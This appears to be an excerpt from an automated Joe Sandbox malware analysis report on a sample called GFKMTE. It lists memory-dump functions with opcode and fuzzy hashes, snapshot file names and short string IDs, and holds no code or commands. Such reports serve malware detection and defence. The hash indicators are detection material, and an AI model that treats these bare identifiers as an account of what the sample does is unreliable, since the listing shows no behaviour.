                                                                                                                                                  • Instruction ID: e5692967992fd5d112742e4e0b3962e1c5cf1f43a6588ccd4af79a6974b15c87
                                                                                                                                                  • Opcode Fuzzy Hash: 69a09b0eb28baa7302a3ae107f04b9c62fe24823742475164e4672b707e9c5c0
                                                                                                                                                  • Instruction Fuzzy Hash: 06011A75A00148EFDB04DBA9C999A5DBFF1AF49210F29C2D9D8089B2A2D6749E01DB41
                                                                                                                                                  Function 0101C878 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: acd442d4d629deb679a1897a1016187bb4c10a2f30deab0fa0ae2c5c35db2385
                                                                                                                                                  • Instruction ID: a07bd2b8ba8945b5bfafa4fe709858d04f2ceb9031c240bf9a199ac9a0501b0a
                                                                                                                                                  • Opcode Fuzzy Hash: acd442d4d629deb679a1897a1016187bb4c10a2f30deab0fa0ae2c5c35db2385
                                                                                                                                                  • Instruction Fuzzy Hash: FE015A74A00208EFD705DFA8CA84A5DBFF1AF48301F2581D9D8089B3A1D634DE00DB41
                                                                                                                                                  Function 01012640 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 44ee7fec223456a1bff417f476262862a64f258718acea9823cb9d5d384f59e2
                                                                                                                                                  • Instruction ID: 62832255ca95d2621f663b8db4896e5efcbb70dfc73ae69c9c3e7b36457d080f
                                                                                                                                                  • Opcode Fuzzy Hash: 44ee7fec223456a1bff417f476262862a64f258718acea9823cb9d5d384f59e2
                                                                                                                                                  • Instruction Fuzzy Hash: C5F0C478A00108EFDB04DFA9CA89A5DBBF5AF48300F65C194E9089B365DB70DE40EB40
                                                                                                                                                  Function 010166E8 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6b055579437e4707d57aa9c348c5aeeca6f2e1cfcf1a79ad86efa1364ac779cf
                                                                                                                                                  • Instruction ID: 811dd4f1a4215d6177e05716071a39abe9ecb8882b76429bce6603d090533ea7
                                                                                                                                                  • Opcode Fuzzy Hash: 6b055579437e4707d57aa9c348c5aeeca6f2e1cfcf1a79ad86efa1364ac779cf
                                                                                                                                                  • Instruction Fuzzy Hash: 25F0C934A00108EFD704DFA9CA85A5DBBF5EF48300F65C194E90897365D670DE40DB40
                                                                                                                                                  Function 0101C888 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 908965e298464ade1c70705db16864a236d46b75a23aac9bc51259a0ffe1082e
                                                                                                                                                  • Instruction ID: 4de3dcabf2c308b03b1bd64d92cb6859164eab5090c2dfb96424489309125fce
                                                                                                                                                  • Opcode Fuzzy Hash: 908965e298464ade1c70705db16864a236d46b75a23aac9bc51259a0ffe1082e
                                                                                                                                                  • Instruction Fuzzy Hash: 9FF0C934A00108EFDB04DFA9CA85B5DBBF1AF48300F25C194E90897365D630DE40DB41
                                                                                                                                                  Function 0101C818 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9e5aa745b7e601c466b54265ee345bcd48356794e4df076fae6fe7eb20f1a0bb
                                                                                                                                                  • Instruction ID: cb590f4628c038bf10740cccd08ab4b881b85adccfafa02b9bc0e9d7943ea8e4
                                                                                                                                                  • Opcode Fuzzy Hash: 9e5aa745b7e601c466b54265ee345bcd48356794e4df076fae6fe7eb20f1a0bb
                                                                                                                                                  • Instruction Fuzzy Hash: 16F08C30D08248AFDB15CFAAD981ADDBFF0AF85200F14C1EAD804AB266E3748A45DB41
                                                                                                                                                  Function 01016678 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a1507d144a65269314e994af60e7ef8e97cdaad91f0a8d5782913dd9f5979685
                                                                                                                                                  • Instruction ID: b890f636f6d04026940a6bfdde8f04ba619628110d35502225eb3ded958fe197
                                                                                                                                                  • Opcode Fuzzy Hash: a1507d144a65269314e994af60e7ef8e97cdaad91f0a8d5782913dd9f5979685
                                                                                                                                                  • Instruction Fuzzy Hash: 23F0AF30904248EFDB05CFA9D850A9DBFF1AF4A301F1481E9D4449B266D7708E45DB90
                                                                                                                                                  Function 010125DB Relevance: .0, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c06f5fe95999a481f585a5b5b62e71d8063afbb8ec4cae42956b74534f425b7e
                                                                                                                                                  • Instruction ID: 29f1cb7eafdd5fe5aa05a3c23f77bd6e389ef6642c930f4322c489db34fd3dc1
                                                                                                                                                  • Opcode Fuzzy Hash: c06f5fe95999a481f585a5b5b62e71d8063afbb8ec4cae42956b74534f425b7e
                                                                                                                                                  • Instruction Fuzzy Hash: 8BF01770900208EFDB09CFAAE940B9DBBF1BF89301F2482A5D4049B265D7709E45EB81
                                                                                                                                                  Function 01010848 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 02cbd31650ff7ec7eec130a8db5a5c1f25e440e288b488dc922722898cf9d917
                                                                                                                                                  • Instruction ID: fd94a6c2ffbd40d2d80fcff473ac8c2d40ca365c6355d1179e7eac96a8628b2a
                                                                                                                                                  • Opcode Fuzzy Hash: 02cbd31650ff7ec7eec130a8db5a5c1f25e440e288b488dc922722898cf9d917
                                                                                                                                                  • Instruction Fuzzy Hash: 72C02B300413048BE23C67AAFC0C32C37ACA703303F840010F6CD000708BF088C0C695
                                                                                                                                                  Function 0101AA90 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 596227b3f4c0ba83326e90abe795e89b3faab3578876eae85f15281b38a61f19
                                                                                                                                                  • Instruction ID: 291a9460640c823e2056ac9de46071afb56f87eb811dde6e3466225cecefb368
                                                                                                                                                  • Opcode Fuzzy Hash: 596227b3f4c0ba83326e90abe795e89b3faab3578876eae85f15281b38a61f19
                                                                                                                                                  • Instruction Fuzzy Hash: D7C08C32046744ABD22027DABD0C32C76E85B0220AF901220D25D024B14BF01450C656

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 07556298 Relevance: 5.3, Strings: 4, Instructions: 336COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1666749075.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_7550000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Xq$Xq$Xq$Xq
                                                                                                                                                  • API String ID: 0-3965792415
                                                                                                                                                  • Opcode ID: 5c6b13b50a23662d370586e5756004bd1a376e3b8c7454abf0b8746403af5205
                                                                                                                                                  • Instruction ID: 52a2ef4212b6966fb453f87e15bc8f845bea45b3361810fa88e964ce2ba6b5b8
                                                                                                                                                  • Opcode Fuzzy Hash: 5c6b13b50a23662d370586e5756004bd1a376e3b8c7454abf0b8746403af5205
                                                                                                                                                  • Instruction Fuzzy Hash: D87108B2B2121D56E7309B589F106FBBF6EFB5A125F291197D60452312CF339B808BE1
                                                                                                                                                  Function 07550850 Relevance: 5.3, Strings: 4, Instructions: 320COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1666749075.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_7550000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Hq$Hq$Hq$Hq
                                                                                                                                                  • API String ID: 0-1646495738
                                                                                                                                                  • Opcode ID: 7e2f7227f1a3c22c12b656a1ee83234154f02d7964be7e75a5838891a942340a
                                                                                                                                                  • Instruction ID: 951871404ba4271d41075e2a80a5e638bd1380e792986b514dc9bc4aad94fdc0
                                                                                                                                                  • Opcode Fuzzy Hash: 7e2f7227f1a3c22c12b656a1ee83234154f02d7964be7e75a5838891a942340a
                                                                                                                                                  • Instruction Fuzzy Hash: 77C18070A006058FDB25DF74D854BAE77B2FFC8340F14892AD44A97398CB35AD46CB91
                                                                                                                                                  Function 07557D60 Relevance: 5.3, Strings: 4, Instructions: 265COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1666749075.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_7550000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Hq$Xq$Xq$e
                                                                                                                                                  • API String ID: 0-2394271603
                                                                                                                                                  • Opcode ID: 344174500cf954324161a4a9524856f1085459e2fd2174bed6a3b87a55248810
                                                                                                                                                  • Instruction ID: 28be5a47a41a4db984230fafcd6bd38a1ebc5955a8649c2c00700134ddc36868
                                                                                                                                                  • Opcode Fuzzy Hash: 344174500cf954324161a4a9524856f1085459e2fd2174bed6a3b87a55248810
                                                                                                                                                  • Instruction Fuzzy Hash: E2915E74B007058FD725AB70C86476FB7A3AFC8241F14892ED84A8B799DF35AC468792

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 014D0B60 Relevance: 2.0, Strings: 1, Instructions: 765COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000020.00000002.1640465630.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_32_2_14d0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: dq
                                                                                                                                                  • API String ID: 0-4057445327
                                                                                                                                                  • Opcode ID: d0d6dbe0a35b4425c838c85a02e6099ab5bed42e04d007547bd9deeb1e427034
                                                                                                                                                  • Instruction ID: 927623ebec3fa0f8e46b883fe7b38183996cccf993126aa0dc882cfc9c6f5964
                                                                                                                                                  • Opcode Fuzzy Hash: d0d6dbe0a35b4425c838c85a02e6099ab5bed42e04d007547bd9deeb1e427034
                                                                                                                                                  • Instruction Fuzzy Hash: 3F8282B4A00229CFDB24DF68D994BDDBBB1BF49304F1086A6D409AB365D734AE85CF50
                                                                                                                                                  Function 014D0A49 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000020.00000002.1640465630.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_32_2_14d0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c73f529b68ecfdb6e6a00c1ae2b77c0cef0e3989299cab74fb378188572bdc07
                                                                                                                                                  • Instruction ID: b59af42f7500726afa2653be921a3f194aaaa226aab3dad8a3bdc00d3bdaf56d
                                                                                                                                                  • Opcode Fuzzy Hash: c73f529b68ecfdb6e6a00c1ae2b77c0cef0e3989299cab74fb378188572bdc07
                                                                                                                                                  • Instruction Fuzzy Hash: 30215971E0024A9FCF51DFA8D480ADDBBB1FF49310F9582AAD555BB261DB30A906CF90
                                                                                                                                                  Function 014D0848 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000020.00000002.1640465630.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_32_2_14d0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f49aef12908887281f6b1e1f3891f70fdb468cf2dc2bfb7cf733aba529f55824
                                                                                                                                                  • Instruction ID: f4b9d6438771fa324351350a68528acffd89ee56ce5a48b435693140e152c185
                                                                                                                                                  • Opcode Fuzzy Hash: f49aef12908887281f6b1e1f3891f70fdb468cf2dc2bfb7cf733aba529f55824
                                                                                                                                                  • Instruction Fuzzy Hash: D4113DB8E00209DFDB10EF64E544B8D7BB1FB84305F0056B8D504AF265DB782E4ACB81
                                                                                                                                                  Function 014D1870 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000020.00000002.1640465630.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_32_2_14d0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7b8cc14465d06feefcdd525f1a961ab38d8e5e1c73b36dce2b5bb77fb284ef4b
                                                                                                                                                  • Instruction ID: 274c47ebd694acf428771af05031677c6cbfe33ffd9c9a901bef1a9eedfc2675
                                                                                                                                                  • Opcode Fuzzy Hash: 7b8cc14465d06feefcdd525f1a961ab38d8e5e1c73b36dce2b5bb77fb284ef4b
                                                                                                                                                  • Instruction Fuzzy Hash: 86F03CB4D0424A9BDF10CFA5D4253EEBBF4AF8A310F14506AD955B7250D7784906CF50
                                                                                                                                                  Function 014D09DF Relevance: .0, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000020.00000002.1640465630.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_32_2_14d0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9dac7ff5c67bb949d57f7f9c538ef51e32d2be8ec04de62a63a5510d44204415
                                                                                                                                                  • Instruction ID: b10a8bc1ca594caa5dbd68f4f40c88c8d98a002447fc8455fc0a69e11ba575d4
                                                                                                                                                  • Opcode Fuzzy Hash: 9dac7ff5c67bb949d57f7f9c538ef51e32d2be8ec04de62a63a5510d44204415
                                                                                                                                                  • Instruction Fuzzy Hash: 0A01E470D04209DFCB55DFA8C455AAEBBF0FF06310F1446AAC455A7261E7748A41DB81
                                                                                                                                                  Function 014D09F0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000020.00000002.1640465630.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_32_2_14d0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b414a88317957bfd199d2f1c5200af36031108ae585da494da75dd6ce538a539
                                                                                                                                                  • Instruction ID: f9c270296ba6790dff0706381a8e16a001b343b1c0cac712e563ec66ca4d244b
                                                                                                                                                  • Opcode Fuzzy Hash: b414a88317957bfd199d2f1c5200af36031108ae585da494da75dd6ce538a539
                                                                                                                                                  • Instruction Fuzzy Hash: E5F0BCB4C00209EFCB44EFB8D555AAEBBF4FB05300F504AAAD415A73A4EB709A44DB81

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00EF0B60 Relevance: 2.0, Strings: 1, Instructions: 765COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000023.00000002.1642575164.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_35_2_ef0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: dq
                                                                                                                                                  • API String ID: 0-4057445327
                                                                                                                                                  • Opcode ID: 53cbd7c856bcacbbafb3751c138b625c6e2921a10854a91a25134e6f74bb2809
                                                                                                                                                  • Instruction ID: 6762c602610a1d0f1c4443fca35c932836379a08fb4cd5f7ebcf17f0cc255f69
                                                                                                                                                  • Opcode Fuzzy Hash: 53cbd7c856bcacbbafb3751c138b625c6e2921a10854a91a25134e6f74bb2809
                                                                                                                                                  • Instruction Fuzzy Hash: F3828174A00229CFDB24DFA8D884BDDBBB1BF49304F1096E6D509BB265D770AA85CF50
                                                                                                                                                  Function 00EF0A49 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000023.00000002.1642575164.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_35_2_ef0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: de27d806f4aefca8efdb1340cd78728e88c4682af3be81c67f6d835b2ea85aec
                                                                                                                                                  • Instruction ID: a36d317aa6e81a1d44fc594a88cee4fa9f807186335a407f8d1013fc630a6f8f
                                                                                                                                                  • Opcode Fuzzy Hash: de27d806f4aefca8efdb1340cd78728e88c4682af3be81c67f6d835b2ea85aec
                                                                                                                                                  • Instruction Fuzzy Hash: 89218C71D0024A9FCF11DFA9C850ADDBFB1EF49300F9582A6D554BB2A1DB30A946CB90
                                                                                                                                                  Function 00EF0848 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000023.00000002.1642575164.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_35_2_ef0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6cb33bfe6cb54d82941a1d0fb9dbceb609248a25fa6b7ffd49b4eaa44a506127
                                                                                                                                                  • Instruction ID: d5015a2f3248f74b9bccdf4e435f4fc92df3d5e6101ede5b62c33ac801b584d1
                                                                                                                                                  • Opcode Fuzzy Hash: 6cb33bfe6cb54d82941a1d0fb9dbceb609248a25fa6b7ffd49b4eaa44a506127
                                                                                                                                                  • Instruction Fuzzy Hash: C4111C74D00209AFDF15EF64E894B8D7BB1EB84305F108668D1059B2A9EBB56A4BCB81
                                                                                                                                                  Function 00EF1870 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000023.00000002.1642575164.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_35_2_ef0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c6b81f3ef3bdddbb6a9c86b97dc8545c66a168e9db7a52f0976bf66d2928c89b
                                                                                                                                                  • Instruction ID: c87ef30a3de9ba783d50ee0ce4b40be5c7b1abf2d0ffa6f8620cddad282dd834
                                                                                                                                                  • Opcode Fuzzy Hash: c6b81f3ef3bdddbb6a9c86b97dc8545c66a168e9db7a52f0976bf66d2928c89b
                                                                                                                                                  • Instruction Fuzzy Hash: A1F0AF70C0828DDBCF14CFA6D8143EEBBF4AB4A300F1060A5D514B7241D7784A05DFA0
                                                                                                                                                  Function 00EF09DF Relevance: .0, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000023.00000002.1642575164.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_35_2_ef0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ba82a7769df887143be210f9713e635d6cc17a78cfe7e64103bd1fa7ba9a3ddc
                                                                                                                                                  • Instruction ID: ba71f160b1eef36395969ee223ffde5a4a9d4a38f6e2023317b6b6e61b7eb674
                                                                                                                                                  • Opcode Fuzzy Hash: ba82a7769df887143be210f9713e635d6cc17a78cfe7e64103bd1fa7ba9a3ddc
                                                                                                                                                  • Instruction Fuzzy Hash: 8001F670D04348DFCB06DFB8D85479DBFB0AF06305F1405EAC455AB2A2EB748A40CB81
                                                                                                                                                  Function 00EF09F0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000023.00000002.1642575164.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_35_2_ef0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 68a8cc9c39913ccedcdf72bfa844dd985318f6ae49c22db8c00d01becadd4a20
                                                                                                                                                  • Instruction ID: 5b6e12888a76279ed92883965ad6f0c7bf21397a305029e989033496b535c713
                                                                                                                                                  • Opcode Fuzzy Hash: 68a8cc9c39913ccedcdf72bfa844dd985318f6ae49c22db8c00d01becadd4a20
                                                                                                                                                  • Instruction Fuzzy Hash: ECF0B270C0020DEFCB44EFB8D940AAEBBB4FF05304F104AAAD415A72A4EB709A44CF81